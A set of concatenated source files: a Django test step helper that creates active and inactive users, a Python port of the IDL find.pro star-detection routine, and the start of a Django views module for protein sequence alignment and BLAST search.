    from django.contrib.auth.models import User, Group
    # NOTE(review): the 'Users' group is created but never attached to the
    # new user (no u.groups.add(group)) -- confirm whether group membership
    # is expected by the scenarios that use this step.
    group, _ = Group.objects.get_or_create(name='Users')
    group.save()
    if super_:
        # NOTE(review): superusers get test@test.com while regular users get
        # foo@example.com -- apparently intentional but unexplained.
        u = User.objects.create_superuser(username=username, email="test@test.com", password=password)
        u.save()
    else:
        u = User(username=username, email='foo@example.com')
        u.set_password(password)
        u.save()
@given('an inactive user with username "(?P<username>.*)" and password "(?P<password>.*)"')
def step_impl(context, username, password):
    """Create a deactivated user account (for login-failure scenarios)."""
    from django.contrib.auth.models import User
    account = User(username=username, email='foo1@example.com')
    account.set_password(password)
    account.is_active = False
    account.save()
|
mc706/prog-strat-game
|
core/features/steps/helpers.py
|
Python
|
mit
| 1,657
|
[
"VisIt"
] |
e31a7ec4ff2ab4a98c901e0b3f1edf3ad89a3d3f788f881fe10f6bd438a36328
|
try:
from stsci.convolve import convolve2d
except ImportError:
from convolve import convolve2d
import math
#from numpy import *
from numpy import sum,array,shape, maximum, arange, exp, where, ravel, zeros, int8, float32, int32
from numpy import minimum, transpose,mean, delete
import os
import pyfits as pf
import time
#------------------------------------------------------------------------------
from astrodata.adutils import paramutil
#------------------------------------------------------------------------------
#def detSources( image, outfile="", verbose=False, sigma=0.0, threshold=2.5, fwhm=5.5,
def detSources( image="", hdu=None, outfile="", verbose=False, sigma=0.0, threshold=2.5, fwhm=5.5,
sharplim=[0.2,1.0], roundlim=[-1.0,1.0], window=None, exts=None,
timing=False, grid=False, rejection=None, ratio=None, drawWindows=False,
dispFrame=1 ):
"""
Performs similar to the source detecting algorithm
'http://idlastro.gsfc.nasa.gov/ftp/pro/idlphot/find.pro'.
References:
This code is heavily influenced by 'http://idlastro.gsfc.nasa.gov/ftp/pro/idlphot/find.pro'.
'find.pro' was written by W. Landsman, STX February, 1987.
This code was converted to Python with areas re-written for optimization by:
River Allen, Gemini Observatory, December 2009. riverallen@gmail.com
Revisions:
NZ - Feb 2011. Taken out of iqtools. Added hdu and listed the numpy functions instead.
- added peakIntensity (flux) as output.
:param image: The filename of the fits file. It must be in the format N2.fits[1]
for the specific extension. (i.e.) If you want to find objects only in
the image extension [1], than you would pass N2.fits[1].
:type filename: String
:param outfile: The name of the file where the output will be written. By default
output will not be written (ie if outfile is left as "", no output file is written).
:type outfile: String
:param verbose: Print out non-critical and debug information.
:type verbose: Boolean [False]
:param sigma: The mean of the background value. If nothing is passed,
detSources will run background() to determine it.
:type sigma: Number [0.0]
:param threshold: "Threshold intensity for a point source - should generally
be 3 or 4 sigma above background RMS"[1]. It was found that 2.5
works best for IQ source detection.
:type threshold: Number [2.5]
:param fwhm: "FWHM to be used in the convolve filter"[1]. This ends up playing a factor in
determining the size of the kernel put through the gaussian convolve.
:type fwhm: Number [5.5]
:param sharplim: "2 element vector giving low and high cutoff for the sharpness
statistic (Default: [0.2,1.0] ). Change this default only if the stars
have significantly larger or smaller concentration than a Gaussian"[1]
:type sharplim: 2-Element List of Numbers. [0.2,1.0]
:param roundlim:
"2 element vector giving low and high cutoff for the roundness
statistic (Default: [-1.0,1.0] ). Change this default only if the stars
are significantly elongated."[1]
:type roundlim: 2-Element List of Numbers. [-1.0,1.0]
:param window:
Rectangle regions of the data to process. detSources will only
look at the data within windows passed, if a window is passed. If no
window is set, detSources will look at the entire image.
Beware: small objects on the edges of the windows may not be detected.
:type window: List of 4 dimensional tuples [None]
::
General Coordinate Form:
( x_offset, y_offset, width, height )
(x_offset + width, y_offset + height)
__________ /
| Window |
|__________|
/
(x_offset, y_offset)
Example:
Window=[(0,0,200,200)]: Looks at a window of size 200, 200 in bottom left corner
Window=[(0,0,halfWidth,Height),(halfWidth,0,halfWidth,Height)]: Splits the image in 2,
divided vertically down the middle.
:param timing: If timing is set to true, the return type for detSources will be a tuple.
The tuple is of the form (xyArray, overalltime) where overalltime represents
the time it took detSources to run minus any displaying time. This feature is
for engineering purposes.
:type timing: Boolean [False]
:param grid: If no window is set, detSources will run the image in a grid.
This is supposed to work in conjunction with rejection.
:type grid: Boolean [False]
:param rejection: Rejection functions to be run on each grid point. See baseHeuristic() for an example.
:type rejection: A list of rejection functions [None]
:param ratio: What the ratio or grid size should be. Ratio of 5 means the image will
be split up into a 5x5 grid. Should be modified to take fixe grid size (50,50), for example.
:type ratio: int [None]
:param drawWindows: If this is set to True, will attempt to draw the windows using
iraf.tvmark(). Beware: a ds9 must be running.
:type drawWindows: Boolean [False]
:param dispFrame: This works in conjunction with drawWindows.
debug=False, grid=False, rejection=None, ratio=None, drawWindows=False,
dispFrame=1
:returns: A list of centroids. For example:
:rtype: A 2-D list.
"""
#===========================================================================
# Parameter Checking
#===========================================================================
# image = paramutil.checkParam( image, str, "" )
if not hdu:
if image == "":
raise "daoFind requires an image file."
imageName, exts = paramutil.checkFileFitExtension( image )
if verbose:
print "Opening and Loading: %s[%d]"% (imageName,exts)
hdu = pf.open( imageName )
if exts is None:
# May want to include astrodata here to deal with
# all 'SCI' extensions, etc.
exts = 1
sciData = hdu[exts].data
else:
sciData = hdu.data
if window is not None:
if type(window) == tuple:
window = [window]
elif type(window) == list:
pass
else:
raise "'window' must be a tuple of length 4, or a list of tuples length 4."
for wind in window:
if type(wind) == tuple:
if len(wind) == 4:
continue
else:
raise 'A window tuple has incorrect information, %s, require x,y,width,height' %(str(wind))
else:
raise 'The window list contains a non-tuple. %s' %(str(wind))
if type( exts ) != int and exts is not None:
raise 'exts must be int or None.'
# outfile = paramutil.checkParam( outfile, str, "" )
writeOutFlag = False
if outfile != "":
writeOutFlag = True
# fwhm = paramutil.checkParam( fwhm, type(0.0), 5.5, 0.0 )
# verbose = paramutil.checkParam( verbose, bool, False )
if len(sharplim) < 2:
raise "Sharplim parameter requires 2 num elements. (i.e. [0.2,1.0])"
if len(roundlim) < 2:
raise "Roundlim parameter requires 2 num elements. (i.e. [-1.0,1.0])"
if verbose:
print "Opened and loaded."
#------------------------------------------------------------------------------
#===========================================================================
# Setup
#===========================================================================
ost = time.time()
maxConvSize = 13 #Maximum size of convolution box in pixels
radius = maximum(0.637 * fwhm, 2.001) #Radius is 1.5 sigma
radiusSQ = radius ** 2
kernelHalfDimension = minimum(array(radius, copy=0).astype(int32), (maxConvSize - 1) / 2)
kernelDimension = 2 * kernelHalfDimension + 1 # Dimension of the kernel or "convolution box"
sigSQ = (fwhm / 2.35482) ** 2
# Mask identifies valid pixels in convolution box
mask = zeros([kernelDimension, kernelDimension], int8)
# g will contain Gaussian convolution kernel
gauss = zeros([kernelDimension, kernelDimension], float32)
row2 = (arange(kernelDimension) - kernelHalfDimension) ** 2
for i in arange(0, (kernelHalfDimension)+(1)):
temp = row2 + i ** 2
gauss[kernelHalfDimension - i] = temp
gauss[kernelHalfDimension + i] = temp
mask = array(gauss <= radiusSQ, copy=0).astype(int32) #MASK is complementary to SKIP in Stetson's Fortran
good = where(ravel(mask))[0] #Value of c are now equal to distance to center
pixels = good.size
# Compute quantities for centroid computations that can be used for all stars
gauss = exp(-0.5 * gauss / sigSQ)
"""
In fitting Gaussians to the marginal sums, pixels will arbitrarily be
assigned weights ranging from unity at the corners of the box to
kernelHalfDimension^2 at the center (e.g. if kernelDimension = 5 or 7, the weights will be
1 2 3 4 3 2 1
1 2 3 2 1 2 4 6 8 6 4 2
2 4 6 4 2 3 6 9 12 9 6 3
3 6 9 6 3 4 8 12 16 12 8 4
2 4 6 4 2 3 6 9 12 9 6 3
1 2 3 2 1 2 4 6 8 6 4 2
1 2 3 4 3 2 1
respectively). This is done to desensitize the derived parameters to
possible neighboring, brighter stars.[1]
"""
xwt = zeros([kernelDimension, kernelDimension], float32)
wt = kernelHalfDimension - abs(arange(kernelDimension).astype(float32) - kernelHalfDimension) + 1
for i in arange(0, kernelDimension):
xwt[i] = wt
ywt = transpose(xwt)
sgx = sum(gauss * xwt, 1)
sumOfWt = sum(wt)
sgy = sum(gauss * ywt, 0)
sumgx = sum(wt * sgy)
sumgy = sum(wt * sgx)
sumgsqy = sum(wt * sgy * sgy)
sumgsqx = sum(wt * sgx * sgx)
vec = kernelHalfDimension - arange(kernelDimension).astype(float32)
dgdx = sgy * vec
dgdy = sgx * vec
sdgdxs = sum(wt * dgdx ** 2)
sdgdx = sum(wt * dgdx)
sdgdys = sum(wt * dgdy ** 2)
sdgdy = sum(wt * dgdy)
sgdgdx = sum(wt * sgy * dgdx)
sgdgdy = sum(wt * sgx * dgdy)
kernel = gauss * mask #Convolution kernel now in c
sumc = sum(kernel)
sumcsq = sum(kernel ** 2) - (sumc ** 2 / pixels)
sumc = sumc / pixels
# The reason for the flatten is because IDL and numpy treat statements like arr[index], where index
# is an array, differently. For example, arr.shape = (100,100), in IDL index=[400], arr[index]
# would work. In numpy you need to flatten in order to get the arr[4][0] you want.
kshape = kernel.shape
kernel = kernel.flatten()
kernel[good] = (kernel[good] - sumc) / sumcsq
kernel.shape = kshape
# Using row2 here is pretty confusing (From IDL code)
# row2 will be something like: [1 2 3 2 1]
c1 = exp(-.5 * row2 / sigSQ)
sumc1 = sum(c1) / kernelDimension
sumc1sq = sum(c1 ** 2) - sumc1
c1 = (c1 - sumc1) / sumc1sq
mask[kernelHalfDimension,kernelHalfDimension] = 0 # From now on we exclude the central pixel
pixels = pixels - 1 # so the number of valid pixels is reduced by 1
# What this operation looks like:
# ravel(mask) = [0 0 1 1 1 0 0 0 1 1 1 1 1 0 1 1 1 1 1 1 1 1 1 1 0 1 ...]
# where(ravel(mask)) = (array([ 2, 3, 4, 8, 9, 10, 11, 12, 14, ...]),)
good = where(ravel(mask))[0] # "good" identifies position of valid pixels
# x and y coordinate of valid pixels
xx = (good % kernelDimension) - kernelHalfDimension
# relative to the center
yy = array(good / kernelDimension, copy=0).astype(int32) - kernelHalfDimension
#------------------------------------------------------------------------------
#===========================================================================
# Extension and Window / Grid
#===========================================================================
xyArray = []
outputLines = []
if sigma <= 0.0:
sigma = background( sciData )
if verbose:
print 'Estimated Background:', sigma
hmin = sigma * threshold
if window is None:
# Make the window the entire image
window = [(0,0,sciData.shape[1],sciData.shape[0])]
if grid:
ySciDim, xSciDim = sciData.shape
xgridsize = int(xSciDim / ratio)
ygridsize = int(ySciDim / ratio)
window = []
for ypos in range(ratio):
for xpos in range(ratio):
window.append( (xpos * xgridsize, ypos * ygridsize, xgridsize, ygridsize) )
drawtime = 0
if drawWindows:
drawtime = draw_windows( window, dispFrame, label=True)
if rejection is None:
rejection = []
elif rejection is 'default':
rejection = [baseHeuristic]
windName = 0
for wind in window:
windName += 1
subXYArray = []
##@@TODO check for negative values, check that dimensions don't violate overall dimensions.
yoffset, xoffset, yDimension, xDimension = wind
if verbose:
print 'x,y,w,h', xoffset, yoffset, xDimension, yDimension
print '='*50
print 'W' + str(windName)
print '='*50
sciSection = sciData[xoffset:xoffset+xDimension,yoffset:yoffset+yDimension]
#=======================================================================
# Quickly determine if a window is worth processing
#=======================================================================
rejFlag = False
for rejFunc in rejection:
if rejFunc(sciSection, sigma, threshold):
rejFlag = True
break
if rejFlag:
# Reject
continue
#------------------------------------------------------------------------------
#===========================================================================
# Convolve
#===========================================================================
if verbose:
print "Beginning convolution of image"
st = time.time()
h = convolve2d( sciSection, kernel ) # Convolve image with kernel
et = time.time()
if verbose:
print 'Convole Time:', ( et-st )
if not grid:
h[0:kernelHalfDimension,:] = 0
h[xDimension - kernelHalfDimension:xDimension,:] = 0
h[:,0:kernelHalfDimension] = 0
h[:,yDimension - kernelHalfDimension:yDimension] = 0
if verbose:
print "Finished convolution of image"
#------------------------------------------------------------------------------
#===========================================================================
# Filter
#===========================================================================
offset = yy * xDimension + xx
index = where(ravel(h >= hmin))[0] # Valid image pixels are greater than hmin
nfound = index.size
if nfound > 0: # Any maxima found?
h = h.flatten()
for i in arange(pixels):
# Needs to be changed
try:
stars = where(ravel(h[index] >= h[index+ offset[i]]))[0]
except:
break
nfound = stars.size
if nfound == 0: # Do valid local maxima exist?
if verbose:
print "No objects found."
break
index = index[stars]
h.shape = (xDimension, yDimension)
ix = index % yDimension # X index of local maxima
iy = index / yDimension # Y index of local maxima
ngood = index.size
else:
if verbose:
print "No objects above hmin (%s) were found." %(str(hmin))
continue
# Loop over star positions; compute statistics
st = time.time()
for i in arange(ngood):
temp = array(sciSection[iy[i] - kernelHalfDimension:(iy[i] + kernelHalfDimension)+1,
ix[i] - kernelHalfDimension:(ix[i] + kernelHalfDimension)+1])
pixIntensity = h[iy[i],ix[i]] # pixel intensity
# Compute Sharpness statistic
#@@FIXME: This should do proper checking...the issue is an out of range index with kernelhalf and temp
# IndexError: index (3) out of range (0<=index<=0) in dimension 0
try:
sharp1 = (temp[kernelHalfDimension,kernelHalfDimension] - (sum(mask * temp)) / pixels) / pixIntensity
except:
continue
if (sharp1 < sharplim[0]) or (sharp1 > sharplim[1]):
# Reject
# not sharp enough?
continue
dx = sum(sum(temp, 1) * c1)
dy = sum(sum(temp, 0) * c1)
if (dx <= 0) or (dy <= 0):
# Reject
continue
around = 2 * (dx - dy) / (dx + dy) # Roundness statistic
# Reject if not within specified roundness boundaries.
if (around < roundlim[0]) or (around > roundlim[1]):
# Reject
continue
"""
Centroid computation: The centroid computation was modified in Mar 2008 and
now differs from DAOPHOT which multiplies the correction dx by 1/(1+abs(dx)).
The DAOPHOT method is more robust (e.g. two different sources will not merge)
especially in a package where the centroid will be subsequently be
redetermined using PSF fitting. However, it is less accurate, and introduces
biases in the centroid histogram. The change here is the same made in the
IRAF DAOFIND routine (see
http://iraf.net/article.php?story=7211&query=daofind ) [1]
"""
sd = sum(temp * ywt, 0)
sumgd = sum(wt * sgy * sd)
sumd = sum(wt * sd)
sddgdx = sum(wt * sd * dgdx)
hx = (sumgd - sumgx * sumd / sumOfWt) / (sumgsqy - sumgx ** 2 / sumOfWt)
# HX is the height of the best-fitting marginal Gaussian. If this is not
# positive then the centroid does not make sense. [1]
if (hx <= 0):
# Reject
continue
skylvl = (sumd - hx * sumgx) / sumOfWt
dx = (sgdgdx - (sddgdx - sdgdx * (hx * sumgx + skylvl * sumOfWt))) / (hx * sdgdxs / sigSQ)
if abs(dx) >= kernelHalfDimension:
# Reject
continue
xcen = ix[i] + dx #X centroid in original array
# Find Y centroid
sd = sum(temp * xwt, 1)
sumgd = sum(wt * sgx * sd)
sumd = sum(wt * sd)
sddgdy = sum(wt * sd * dgdy)
hy = (sumgd - sumgy * sumd / sumOfWt) / (sumgsqx - sumgy ** 2 / sumOfWt)
if (hy <= 0):
# Reject
continue
skylvl = (sumd - hy * sumgy) / sumOfWt
dy = (sgdgdy - (sddgdy - sdgdy * (hy * sumgy + skylvl * sumOfWt))) / (hy * sdgdys / sigSQ)
if abs(dy) >= kernelHalfDimension:
# Reject
continue
ycen = iy[i] + dy #Y centroid in original array
subXYArray.append( [xcen, ycen, pixIntensity] )
et = time.time()
if verbose:
print 'Looping over Stars time:', ( et - st )
subXYArray = averageEachCluster( subXYArray, 10 )
xySize = len(subXYArray)
for i in range( xySize ):
subXYArray[i] = subXYArray[i].tolist()
# I have no idea why the positions are slightly modified. Was done originally in
# iqTool, perhaps for minute correcting.
subXYArray[i][0] += 1
subXYArray[i][1] += 1
subXYArray[i][0] += yoffset
subXYArray[i][1] += xoffset
if writeOutFlag:
outputLines.append( " ".join( [str(subXYArray[i][0]), str(subXYArray[i][1])] )+"\n" )
xyArray.extend(subXYArray)
oet = time.time()
overall_time = (oet-ost-drawtime)
if verbose:
print 'No. of objects detected:', len(xyArray)
print 'Overall time:', overall_time, 'seconds.'
if writeOutFlag:
outputFile = open( outfile, "w" )
outputFile.writelines( outputLines )
outputFile.close()
if timing:
return xyArray, overall_time
else:
return xyArray
#------------------------------------------------------------------------------
def averageEachCluster( xyArray, pixApart=10.0 ):
    """
    detSources can produce multiple centers for an object. This algorithm corrects that
    For Example:
    626.645599527 179.495974369
    626.652254706 179.012831637
    626.664059364 178.930738423
    626.676504143 178.804093054
    626.694643376 178.242374891
    This function will try to cluster these close points together, and produce a single center by
    taking the mean of the cluster. This function is based off the removeNeighbors function in iqUtil.py

    Note: the caller's list is sorted in place, and the x-ordering is what
    allows the inner scan to stop at the first point more than *pixApart*
    away in x.

    :param xyArray: The list of centers of found stars, [x, y, ...] rows.
    :type xyArray: List

    :param pixApart: The max pixels apart for a star to be considered part of a cluster.
    :type pixApart: Number

    :return: The centroids of the stars sorted by the X dimension.
    :rtype: List of numpy arrays
    """
    newXYArray = []
    xyArray.sort()
    xyArray = array( xyArray )
    xyArrayForMean = []
    xyClusterFlag = False

    j = 0
    while j < (xyArray.shape[0]):
        # Scan forward for points within pixApart in both x and y.
        i = j + 1
        while i < xyArray.shape[0]:
            diffx = xyArray[j][0] - xyArray[i][0]
            if abs(diffx) < pixApart:
                diffy = xyArray[j][1] - xyArray[i][1]
                if abs(diffy) < pixApart:
                    if not xyClusterFlag:
                        xyClusterFlag = True
                        xyArrayForMean.append(j)
                    xyArrayForMean.append(i)
                i = i + 1
            else:
                # Sorted by x, so no later point can be close enough.
                break

        if xyClusterFlag:
            # FIX: the original also computed mean(..., axis=1) and discarded
            # the result; that dead computation is removed.
            newXYArray.append( mean( xyArray[xyArrayForMean], axis=0 ) )
            # FIX: remove every cluster row in one vectorized call instead of
            # one delete per index (which needed reverse-order deletion to
            # keep the remaining indices valid).
            xyArray = delete( xyArray, xyArrayForMean, 0 )
            xyArrayForMean = []
            xyClusterFlag = False
            # Re-examine position j, which now holds the next surviving row.
            j = j - 1
        else:
            newXYArray.append( xyArray[j] )
        j = j + 1

    return newXYArray
#------------------------------------------------------------------------------
def baseHeuristic( scidata, sigma, threshold ):
    '''
    A simple heuristic for rejecting empty grids or grids with only cosmic rays.

    :param scidata: The gridpoint data.
    :type scidata: numpy.array

    :param sigma: The background value for the image.
    :type sigma: float

    :param threshold: The threshold used by detSources.
    :type threshold: int or float

    :return: True if the grid is worth rejection.
    :rtype: Boolean
    '''
    # BUG FIX: the original passed ``background * sigma`` where ``background``
    # is the module-level *function*, so the expression always raised
    # TypeError.  detSources' detection cutoff is hmin = sigma * threshold,
    # so that product is used as the pixel cutoff here.
    stars = starCandidates(scidata, sigma * threshold)
    # Fewer than 20 above-cutoff pixels => treat the grid as empty (or as
    # containing only cosmic-ray hits) and reject it.
    if stars.size < 20:
        return True
    return False
#---------------------------------------------------------------------------
def starCandidates(scidata, mean=None):
    """
    Return the row indices of every pixel brighter than a cutoff.

    :param scidata: Science data for checking.
    :type scidata: numpy.array

    :param mean: explicit brightness cutoff; when None the cutoff is
                 ``scidata.std() + scidata.mean()``.

    :return: A list of all points greater than mean.
    :rtype: numpy.array
    """
    if mean is None:
        cutoff = scidata.std() + scidata.mean()
        bright = where(scidata[:, :] > cutoff)
    else:
        bright = where(scidata > mean)
    # ``where`` on a 2-D array yields (rows, cols); only the row indices
    # are returned, matching the original behaviour.
    return bright[0]
#------------------------------------------------------------------------------
def background(scidata):
    """Estimate the background RMS of *scidata*.

    Pixels above ``std + mean`` (source candidates) are replaced by the
    image mean; afterwards pixels below ``std - mean`` are replaced too,
    and the standard deviation of the clipped copy is returned.

    NOTE(review): the lower cutoff really is ``std() - mean()`` (not
    ``mean() - std()``); it looks suspicious but is preserved as-is.

    :param scidata: science data array, containing only the object to be fit
    :type scidata: numpy.array
    """
    avg = scidata.mean()
    spread = scidata.std()
    clipped = scidata * 1.  # float copy; the caller's array is untouched
    clipped[where(clipped > (spread + avg))] = avg
    # This mask is evaluated AFTER the bright pixels were replaced above.
    clipped[where(clipped < (spread - avg))] = avg
    return clipped.std()
#------------------------------------------------------------------------------
def draw_windows( window, dispFrame=1, label=True ):
    '''
    Mark each window rectangle on the ds9 display with iraf.tvmark and
    return the seconds spent drawing (so callers can subtract it from
    their own timing).
    '''
    import pyraf
    from pyraf import iraf

    t_start = time.time()
    coord_file = 'tmpfile.tmp'
    for idx, win in enumerate(window):
        # The following is annoying IRAF file nonsense: tvmark reads its
        # coordinates from a file, so write one entry per window.
        handle = open( coord_file, 'w' )
        handle.write( '%s %s W%s\n' %(str(win[0]+(win[2]/2)),str(win[1]+(win[3]/2)), str(idx + 1)) )
        handle.close()
        iraf.tvmark( frame=dispFrame,coords=coord_file, mark='rectangle',
                     pointsize=8, color=204, label=label, lengths=str(win[2])+' '+str(float(win[3])/float(win[2])) )
    return time.time() - t_start
|
pyrrho314/recipesystem
|
trunk/devel/fluxcal/detSources.py
|
Python
|
mpl-2.0
| 27,056
|
[
"Gaussian"
] |
05af82fa5ec76a101a1de4fc8c8ea0706f68b6afd9fdec5ee81e568780b7aead
|
from django.shortcuts import render
from django.conf import settings
from django.http import HttpResponse
from django.views.generic import TemplateView
from django.db.models import Case, When
from django.core.cache import cache
from django.core.cache import caches
# Use the dedicated 'alignments' cache when one is configured; fall back
# to the default cache otherwise.
try:
    cache_alignment = caches['alignments']
except Exception:
    # caches[...] raises when the alias is missing from settings;
    # an Exception catch replaces the previous bug-hiding bare except.
    cache_alignment = cache
from alignment.functions import get_proteins_from_selection
from common import definitions
from common.selection import Selection
from common.views import AbsTargetSelection
from common.views import AbsSegmentSelection
from common.views import AbsMiscSelection
from common.sequence_signature import SequenceSignature, SignatureMatch, signature_score_excel
from structure.functions import BlastSearch
# from common.alignment_SITE_NAME import Alignment
Alignment = getattr(__import__('common.alignment_' + settings.SITE_NAME, fromlist=['Alignment']), 'Alignment')
from protein.models import Protein, ProteinSegment, ProteinFamily, ProteinSet
from residue.models import ResidueNumberingScheme, ResiduePositionSet
from collections import OrderedDict
from copy import deepcopy
import hashlib
import inspect
from io import BytesIO
import itertools
import json
import numpy as np
import os
import xlsxwriter
import xlrd
class TargetSelection(AbsTargetSelection):
    """Step 1 of 2 in the alignment workflow: pick target proteins."""
    step = 1
    number_of_steps = 2
    docs = 'sequences.html#structure-based-alignments'
    # only the targets box is active at this step
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', True),
        ('segments', False),
    ])
    buttons = {
        'continue': {
            'label': 'Continue to next step',
            'url': '/alignment/segmentselection',
            'color': 'success',
        },
    }
class PosTargetSelection(AbsTargetSelection):
    """Step 1 of 4 in the signature workflow: pick the positive target set."""
    step = 1
    number_of_steps = 4
    docs = 'sequences.html#structure-based-alignments'
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', True),
        ('segments', False),
    ])
    buttons = {
        'continue': {
            'label': 'Continue to next step',
            'url': '/alignment/negativegroupselection',
            'color': 'success',
        },
    }
class NegTargetSelection(AbsTargetSelection):
    """Step 2 of 4 in the signature workflow: pick the negative target set.

    The positive set chosen in the previous step is moved to its own
    session key so the selection machinery can be reused for this set.
    """
    step = 2
    number_of_steps = 4
    docs = 'sequences.html#structure-based-alignments'
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', True),
        ('segments', False),
    ])
    buttons = {
        'continue': {
            'label': 'Continue to next step',
            'url': '/alignment/segmentselectionsignature',
            'color': 'success',
        },
    }

    def get_context_data(self, **kwargs):
        """Stash the current selection as the positive set and clear it.

        A bit ugly solution to having two target sets without modifying
        half of common.selection.
        """
        context = super(NegTargetSelection, self).get_context_data(**kwargs)
        self.request.session['targets_pos'] = deepcopy(self.request.session.get('selection', False))
        # pop() instead of del: do not raise KeyError when no selection
        # exists yet (the get() above already tolerates that case)
        self.request.session.pop('selection', None)
        return context
class TargetSelectionGprotein(AbsTargetSelection):
    """Step 1 of 2: pick G protein targets for an alignment."""
    step = 1
    number_of_steps = 2
    psets = False
    filters = True
    filter_gprotein = True
    docs = 'sequences.html#structure-based-alignments'
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', True),
        ('segments', False),
    ])
    buttons = {
        'continue': {
            'label': 'Continue to next step',
            'url': '/alignment/segmentselectiongprot',
            'color': 'success',
        },
    }
    # Preload the G protein family tree (slug 100_000) for the selection
    # widget. This runs at import time, so database failures (e.g. empty
    # DB during migrations) are deliberately swallowed.
    try:
        if ProteinFamily.objects.filter(slug="100_000").exists():
            ppf = ProteinFamily.objects.get(slug="100_000")
            pfs = ProteinFamily.objects.filter(parent=ppf.id)
            ps = Protein.objects.filter(family=ppf)
            tree_indent_level = []
            action = 'expand'
            # remove the parent family (for all other families than the root of the tree, the parent should be shown)
            del ppf
    except Exception as e:
        pass
class TargetSelectionArrestin(AbsTargetSelection):
    """Step 1 of 2: pick arrestin targets for an alignment."""
    step = 1
    number_of_steps = 2
    psets = False
    filters = True
    # NOTE(review): this sets the G protein filter flag in an Arrestin
    # view -- looks like a copy-paste leftover; confirm intended flag.
    filter_gprotein = True
    docs = 'sequences.html#structure-based-alignments'
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', True),
        ('segments', False),
    ])
    buttons = {
        'continue': {
            'label': 'Continue to next step',
            'url': '/alignment/segmentselectionsignature',
            'color': 'success',
        },
    }
    # Preload the arrestin family tree (slug 200_000). Runs at import
    # time, so database failures are deliberately swallowed.
    try:
        if ProteinFamily.objects.filter(slug="200_000").exists():
            ppf = ProteinFamily.objects.get(slug="200_000")
            pfs = ProteinFamily.objects.filter(parent=ppf.id)
            ps = Protein.objects.filter(family=ppf)
            tree_indent_level = []
            action = 'expand'
            # remove the parent family (for all other families than the root of the tree, the parent should be shown)
            del ppf
    except Exception as e:
        pass
class SegmentSelection(AbsSegmentSelection):
    """Step 2 of 2 in the alignment workflow: pick sequence segments."""
    step = 2
    number_of_steps = 2
    docs = 'sequences.html#structure-based-alignments'
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', True),
        ('segments', True),
    ])
    buttons = {
        'continue': {
            'label': 'Show alignment',
            'url': '/alignment/render',
            'color': 'success',
        },
    }
class SegmentSelectionGprotein(AbsSegmentSelection):
    """Step 2 of 2: pick sequence segments for a G protein alignment."""
    step = 2
    number_of_steps = 2
    docs = 'sequences.html#structure-based-alignments'
    description = 'Select sequence segments in the middle column for G proteins. You can expand every structural element and select individual' \
        + ' residues by clicking on the down arrows next to each helix, sheet or loop.\n\n You can select the full sequence or show all structured regions at the same time.\n\nSelected segments will appear in the' \
        + ' right column, where you can edit the list.\n\nOnce you have selected all your segments, click the green' \
        + ' button.'
    template_name = 'common/segmentselection.html'
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', True),
        ('segments', True),
    ])
    buttons = {
        'continue': {
            'label': 'Show alignment',
            'url': '/alignment/render',
            'color': 'success',
        },
    }
    position_type = 'gprotein'
    # Residue position sets and G protein segments offered by the widget;
    # querysets evaluated lazily, built once at import time.
    rsets = ResiduePositionSet.objects.filter(name__in=['Gprotein Barcode', 'YM binding site']).prefetch_related('residue_position')
    ss = ProteinSegment.objects.filter(partial=False, proteinfamily='Gprotein').prefetch_related('generic_numbers')
    ss_cats = ss.values_list('category').order_by('category').distinct('category')
class SegmentSelectionArrestin(AbsSegmentSelection):
    """Step 2 of 2: pick sequence segments for an arrestin alignment."""
    step = 2
    number_of_steps = 2
    docs = 'sequences.html#structure-based-alignments'
    description = 'Select sequence segments in the middle column for beta and visual arrestins. You can expand every structural element and select individual' \
        + ' residues by clicking on the down arrows next to each helix, sheet or loop.\n\n You can select the full sequence or show all structured regions at the same time.\n\nSelected segments will appear in the' \
        + ' right column, where you can edit the list.\n\nOnce you have selected all your segments, click the green' \
        + ' button.'
    template_name = 'common/segmentselection.html'
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', True),
        ('segments', True),
    ])
    buttons = {
        'continue': {
            'label': 'Show alignment',
            'url': '/alignment/render',
            'color': 'success',
        },
    }
    position_type = 'arrestin'
    ## Add some Arrestin specific positions
    rsets = ResiduePositionSet.objects.filter(name__in=['Arrestin interface']).prefetch_related('residue_position')
    ## ProteinSegment for different proteins
    ss = ProteinSegment.objects.filter(partial=False, proteinfamily='Arrestin').prefetch_related('generic_numbers')
    ss_cats = ss.values_list('category').order_by('category').distinct('category')
class SegmentSelectionSignature(AbsSegmentSelection):
    """Step 3 of 4 in the signature workflow: pick segments to compare."""
    step = 3
    number_of_steps = 4
    selection_boxes = OrderedDict([
        ('reference', False),
        ('targets', False),
        ('segments', True),
    ])
    buttons = {
        'continue': {
            'label': 'Calculate sequence signature',
            'url': '/alignment/render_signature',
            'color': 'success',
        },
    }
class BlastSearchInput(AbsMiscSelection):
    """Single-step form for entering a query sequence for BLAST search."""
    step = 1
    number_of_steps = 1
    docs = 'sequences.html#similarity-search-blast'
    title = 'BLAST search'
    description = 'Enter a sequence into the text box and press the green button.'
    buttons = {
        'continue': {
            'label': 'BLAST',
            # submit the form in place rather than navigating to a URL
            'onclick': 'document.getElementById("form").submit()',
            'color': 'success',
        },
    }
    selection_boxes = {}
    blast_input = True
class BlastSearchResults(TemplateView):
    """
    An interface for blast similarity search of the input sequence.
    """
    template_name = "blast/blast_search_results.html"

    def post(self, request, *args, **kwargs):
        """Run BLAST on the submitted sequence and render the hit list.

        POST parameters:
            input_seq -- the query sequence
            human     -- if present, search the human-only database
        """
        # Build the searcher once; only the database choice differs,
        # so the (previously duplicated) run() call happens in one place.
        if 'human' in request.POST:
            blast = BlastSearch(
                blastdb=os.sep.join([settings.STATICFILES_DIRS[0], 'blast',
                                     'protwis_human_blastdb']),
                top_results=50)
        else:
            blast = BlastSearch(top_results=50)
        blast_out = blast.run(request.POST['input_seq'])

        context = {
            # resolve each hit's pk to a Protein, keeping its score
            'results': [(Protein.objects.get(pk=x[0]), x[1]) for x in blast_out],
            'input': request.POST['input_seq'],
        }
        return render(request, self.template_name, context)
def render_alignment(request):
    """Build (or fetch from cache) the alignment for the session selection.

    The rendered response is cached for one week, keyed on the md5 of the
    sorted protein pks plus segment ids. Selections containing 'Custom'
    segments are always rebuilt and never cached.
    """
    # get the user selection from session
